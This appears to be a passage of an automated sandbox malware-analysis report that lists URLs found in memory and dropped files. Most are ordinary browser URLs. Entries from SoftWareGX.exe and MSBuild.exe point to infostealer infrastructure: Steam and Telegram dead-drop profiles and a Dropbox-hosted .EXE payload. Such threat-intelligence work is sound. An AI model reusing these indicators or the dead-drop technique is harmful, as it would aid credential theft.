                Source: chrome.exe, 00000011.00000003.1412646213.0000164000904000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
                Source: chrome.exe, 00000011.00000003.1410073257.000016400071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
                Source: chrome.exe, 00000011.00000003.1446902159.000046FC0355C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1446713708.000046FC034DF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1446074641.000046FC0355C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1446902159.000046FC03578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
                Source: chrome.exe, 00000011.00000003.1432722007.000046FC032C6000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432562852.000046FC02525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
                Source: chrome.exe, 00000011.00000003.1432722007.000046FC032C6000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432562852.000046FC02525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
                Source: chrome.exe, 00000011.00000003.1411127055.0000164000878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
                Source: chrome.exe, 00000011.00000003.1410073257.000016400071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://m.kugou.com/
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://m.soundcloud.com/
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://m.vk.com/
                Source: chrome.exe, 00000011.00000003.1446902159.000046FC0355C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1446713708.000046FC034DF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1446074641.000046FC0355C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1446902159.000046FC03578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
                Source: msedge.exe, 00000013.00000002.1551181144.00000C34002E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
                Source: msedge.exe, 00000013.00000002.1551181144.00000C34002E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
                Source: Cookies.22.drString found in binary or memory: https://msn.comXANDR_PANID/
                Source: Cookies.22.drString found in binary or memory: https://msn.comXANDR_PANIDv10
                Source: Cookies.22.drString found in binary or memory: https://msn.comXID/
                Source: Cookies.22.drString found in binary or memory: https://msn.comXIDv10
                Source: Cookies.22.drString found in binary or memory: https://msn.comreceive-cookie-deprecation/-
                Source: Cookies.22.drString found in binary or memory: https://msn.comreceive-cookie-deprecationv10dK
                Source: Cookies.22.drString found in binary or memory: https://msn.comtluidp/.;
                Source: Cookies.22.drString found in binary or memory: https://msn.comtluidpv1061
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://music.amazon.com
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://music.apple.com
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://music.yandex.com
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome2B
                Source: chrome.exe, 00000011.00000003.1427109914.000046FC0319C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/
                Source: 2cc80dabc69f58b6_1.21.dr, 4cb013792b196a35_1.21.drString found in binary or memory: https://ntp.msn.cn/edge/ntp
                Source: 000003.log6.21.dr, 2cc80dabc69f58b6_0.21.dr, 4cb013792b196a35_0.21.drString found in binary or memory: https://ntp.msn.com
                Source: 000003.log3.21.dr, Network Action Predictor.21.dr, 000003.log1.21.drString found in binary or memory: https://ntp.msn.com/
                Source: QuotaManager.21.drString found in binary or memory: https://ntp.msn.com/_default
                Source: 2cc80dabc69f58b6_1.21.dr, 4cb013792b196a35_1.21.dr, 000003.log1.21.drString found in binary or memory: https://ntp.msn.com/edge/ntp
                Source: 2cc80dabc69f58b6_1.21.dr, 4cb013792b196a35_1.21.dr, 000003.log1.21.drString found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
                Source: Session_13382730677706579.21.drString found in binary or memory: https://ntp.msn.com/edge/ntp?&form=MT004B&OCID=MT004B
                Source: Session_13382730677706579.21.drString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
                Source: QuotaManager.21.drString found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
                Source: 000003.log6.21.drString found in binary or memory: https://ntp.msn.comHI
                Source: msedge.exe, 00000013.00000002.1551181144.00000C34002E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
                Source: chrome.exe, 00000011.00000003.1446816707.000046FC035C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
                Source: chrome.exe, 00000011.00000003.1447213026.000046FC02494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
                Source: chrome.exe, 00000011.00000003.1446816707.000046FC035C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
                Source: chrome.exe, 00000011.00000003.1446816707.000046FC035C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://open.spotify.com
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://outlook.live.com/mail/0/
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://outlook.office.com/mail/0/
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
                Source: msedge.exe, 00000013.00000003.1536893478.00000C3400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
                Source: msedge.exe, 00000013.00000003.1536893478.00000C3400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
                Source: msedge.exe, 00000013.00000003.1536893478.00000C3400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
                Source: msedge.exe, 00000013.00000003.1536893478.00000C3400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
                Source: msedge.exe, 00000013.00000003.1536893478.00000C3400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
                Source: msedge.exe, 00000013.00000003.1536893478.00000C3400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
                Source: msedge.exe, 00000013.00000003.1536893478.00000C3400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
                Source: msedge.exe, 00000013.00000003.1536893478.00000C3400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
                Source: msedge.exe, 00000013.00000003.1536893478.00000C3400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
                Source: msedge.exe, 00000013.00000003.1536893478.00000C3400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
                Source: msedge.exe, 00000013.00000003.1536893478.00000C3400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
                Source: msedge.exe, 00000013.00000003.1536893478.00000C3400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
                Source: msedge.exe, 00000013.00000003.1536893478.00000C3400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
                Source: msedge.exe, 00000013.00000003.1536893478.00000C3400280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
                Source: chrome.exe, 00000011.00000003.1427109914.000046FC0319C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
                Source: chrome.exe, 00000011.00000003.1432722007.000046FC032C6000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432562852.000046FC02525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
                Source: chromecache_698.18.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
                Source: chrome.exe, 00000011.00000003.1427109914.000046FC0319C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                Source: 2cc80dabc69f58b6_1.21.dr, 4cb013792b196a35_1.21.dr | String found in binary or memory: https://sb.scorecardresearch.com/
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://shieldedids-pa.googleapis.com2
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://shieldedids-pa.googleapis.comJv
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://shieldedids-pa.googleapis.comb
                Source: 2cc80dabc69f58b6_1.21.dr, 4cb013792b196a35_1.21.dr | String found in binary or memory: https://srtb.msn.cn/
                Source: 2cc80dabc69f58b6_1.21.dr, 4cb013792b196a35_1.21.dr | String found in binary or memory: https://srtb.msn.com/
                Source: chrome.exe, 00000011.00000003.1446580751.000046FC02498000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com
                Source: chrome.exe, 00000011.00000003.1446713708.000046FC034DF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1446074641.000046FC0355C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1447058718.000046FC03646000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
                Source: SoftWareGX.exe, 00000005.00000002.1305831427.0000000004D29000.00000004.00000800.00020000.00000000.sdmp, SoftWareGX.exe, 00000005.00000002.1305403965.0000000003DBA000.00000004.00000800.00020000.00000000.sdmp, SoftWareGX.exe, 00000005.00000002.1305831427.0000000004CC9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 0000000F.00000002.2005647226.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199820567237
                Source: MSBuild.exe, 0000000F.00000002.2005647226.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199820567237hac22tlMozilla/5.0
                Source: MSBuild.exe, 0000000F.00000002.2016179797.0000000004602000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: MSBuild.exe, 0000000F.00000002.2016179797.0000000004602000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: MSBuild.exe, 0000000F.00000002.2006634073.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t.me/
                Source: SoftWareGX.exe, 00000005.00000002.1305831427.0000000004D29000.00000004.00000800.00020000.00000000.sdmp, SoftWareGX.exe, 00000005.00000002.1305403965.0000000003DBA000.00000004.00000800.00020000.00000000.sdmp, SoftWareGX.exe, 00000005.00000002.1305403965.0000000003D6B000.00000004.00000800.00020000.00000000.sdmp, SoftWareGX.exe, 00000005.00000002.1305831427.0000000004CC9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 0000000F.00000002.2005647226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.2006634073.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.2006634073.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t.me/m08mbk
                Source: SoftWareGX.exe, 00000005.00000002.1305403965.0000000003D6B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://t.me/m08mbkhac22tl
                Source: MSBuild.exe, 0000000F.00000002.2005647226.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://t.me/m08mbkhac22tlMozilla/5.0
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr | String found in binary or memory: https://tidal.com/
                Source: 1ddcd8e3-07be-4b08-a481-09c222a4e74b.tmp.22.dr | String found in binary or memory: https://trace.mediago.io
                Source: 1ddcd8e3-07be-4b08-a481-09c222a4e74b.tmp.22.dr | String found in binary or memory: https://trace.popin.cc
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr | String found in binary or memory: https://twitter.com/
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr | String found in binary or memory: https://vibe.naver.com/today
                Source: MSBuild.exe, 0000000F.00000002.2006634073.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://web.telegram.org
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr | String found in binary or memory: https://web.telegram.org/
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr | String found in binary or memory: https://web.whatsapp.com
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr | String found in binary or memory: https://word.new?from=EdgeM365Shoreline
                Source: MSBuild.exe, 0000000F.00000002.2006634073.000000000100B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.2013453032.00000000043EA000.00000004.00000020.00020000.00000000.sdmp, 2noh4e.15.dr | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_39e4b8f6fd6635158ad433436bdaa069841cfdf8e1989e03
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr | String found in binary or memory: https://www.deezer.com/
                Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C4E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/
                Source: MSBuild.exe, 0000000F.00000002.2011477912.00000000040A7000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.2006634073.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.2006634073.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/scl/fi/ug8gna48ijslhqchxc0ec/67937ef0b237a.EXE?rlkey=tj0v2wuhbs6521y6cnm79fu
                Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, jwb1v3.15.dr | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: chrome.exe, 00000011.00000003.1433605279.000046FC02494000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1446580751.000046FC02498000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com
                Source: chrome.exe, 00000011.00000003.1433605279.000046FC02494000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1446580751.000046FC02498000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com;report-uri
                Source: chrome.exe, 00000011.00000003.1446580751.000046FC02498000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
                Source: chrome.exe, 00000011.00000003.1425524155.000046FC02EE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1425865507.000046FC02EC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
                Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.2011477912.000000000402A000.00000004.00000020.00020000.00000000.sdmp, zmy5pp.15.dr, jwb1v3.15.dr, Web Data.21.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: chrome.exe, 00000011.00000003.1446902159.000046FC0355C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1446713708.000046FC034DF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1446074641.000046FC0355C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1446902159.000046FC03578000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
                Source: chrome.exe, 00000011.00000003.1446816707.000046FC035C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/search
                Source: chrome.exe, 00000011.00000003.1432562852.000046FC02525000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/search?q=$
                Source: chrome.exe, 00000011.00000003.1433605279.000046FC02494000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.googleapis.com/auth/aida2
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
                Source: chrome.exe, 00000011.00000003.1446580751.000046FC02498000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com
                Source: chrome.exe, 00000011.00000003.1446580751.000046FC02498000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
                Source: chromecache_698.18.dr | String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
                Source: chromecache_698.18.dr | String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
                Source: chromecache_698.18.dr | String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
                Source: chrome.exe, 00000011.00000003.1447058718.000046FC03646000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
                Source: chrome.exe, 00000011.00000003.1446418498.000046FC0317C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1446074641.000046FC0355C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1447058718.000046FC03646000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
                Source: chrome.exe, 00000011.00000003.1446816707.000046FC035C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.GeV8o4Zu9xM.2019.O/rt=j/m=q_dnp
                Source: chrome.exe, 00000011.00000003.1446816707.000046FC035C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.ibLFXwX0rCY.L.W.O/m=qmd
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr | String found in binary or memory: https://www.iheart.com/podcast/
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr | String found in binary or memory: https://www.instagram.com
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr | String found in binary or memory: https://www.last.fm/
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr | String found in binary or memory: https://www.messenger.com
                Source: MSBuild.exe, 0000000F.00000002.2016179797.0000000004602000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.c0yfKF26qNRb
                Source: MSBuild.exe, 0000000F.00000002.2016179797.0000000004602000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.w0HgyL2ZPBj2
                Source: MSBuild.exe, 0000000F.00000002.2016179797.0000000004602000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                Source: MSBuild.exe, 0000000F.00000002.2016179797.0000000004602000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: MSBuild.exe, 0000000F.00000002.2016179797.0000000004602000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: 000003.log6.21.dr | String found in binary or memory: https://www.msn.com
                Source: 000003.log3.21.dr | String found in binary or memory: https://www.msn.com/
                Source: 2cc80dabc69f58b6_1.21.dr, 4cb013792b196a35_1.21.dr | String found in binary or memory: https://www.msn.com/web-notification-icon-light.png
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr | String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr | String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr | String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
                Source: Session_13382730677706579.21.dr | String found in binary or memory: https://www.msn.com/widgets/fullpage/distribution/edgewelcome?experiences=DistributionPage&ocid=edge
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr | String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr | String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr | String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr | String found in binary or memory: https://www.office.com
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr | String found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr | String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr | String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr | String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr | String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr | String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr | String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
                Source: MSBuild.exe, 0000000F.00000002.2006634073.000000000100B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.2013453032.00000000043EA000.00000004.00000020.00020000.00000000.sdmp, 2noh4e.15.dr | String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr | String found in binary or memory: https://www.youtube.com
                Source: chrome.exe, 00000011.00000003.1460673087.000046FC03D79000.00000004.00000800.00020000.00000000.sdmp, Favicons.21.dr | String found in binary or memory: https://www.youtube.com/
                Source: chrome.exe, 00000011.00000003.1460673087.000046FC03D79000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/-
                Source: chrome.exe, 00000011.00000003.1451551802.000046FC03314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1460938291.000046FC03DB4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/?feature=ytca
                Source: chrome.exe, 00000011.00000003.1460938291.000046FC03DB4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/?feature=ytcaF
                Source: chrome.exe, 00000011.00000003.1460938291.000046FC03DB4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/?feature=ytcaogl
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr | String found in binary or memory: https://y.music.163.com/m/
                Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
